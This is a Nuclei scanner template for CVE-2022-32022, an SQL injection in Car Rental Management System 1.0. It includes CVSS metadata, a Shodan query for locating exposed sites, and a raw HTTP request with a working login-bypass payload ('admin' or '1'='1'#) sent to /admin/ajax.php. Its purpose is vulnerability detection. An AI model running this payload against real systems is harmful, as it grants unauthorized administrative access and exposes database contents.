60 lines
2.1 KiB
YAML
60 lines
2.1 KiB
YAML
id: CVE-2022-32022
|
|
|
|
info:
|
|
name: Car Rental Management System 1.0 - SQL Injection
|
|
author: arafatansari
|
|
severity: high
|
|
description: |
|
|
Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/ajax.php?action=login. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
|
|
remediation: |
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-32022
|
|
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-1.md.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2022-32022
|
|
cwe-id: CWE-89
|
|
epss-score: 0.00762
|
|
epss-percentile: 0.79062
|
|
cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: car_rental_management_system_project
|
|
product: car_rental_management_system
|
|
shodan-query: http.html:"Car Rental Management System"
|
|
tags: cve,cve2022,carrental,cms,sqli,login-bypass
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /admin/ajax.php?action=login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username=admin'+or+'1'%3D'1'%23&password=admin
|
|
- |
|
|
GET /admin/index.php?page=home HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'Welcome back Administrator!'
|
|
- 'action=logout'
|
|
- 'Manage Account'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a0046304402201fe55e5765db563994d5527db2b7fbbc8beeac9a3d26b9ae352d4d5759d953f8022008ba902dd2b621d2550fc6758adf14fd2ebd84ec6a2e20ea69c1238c2c6ec680:922c64590222798bb761d5b6d8e72950
|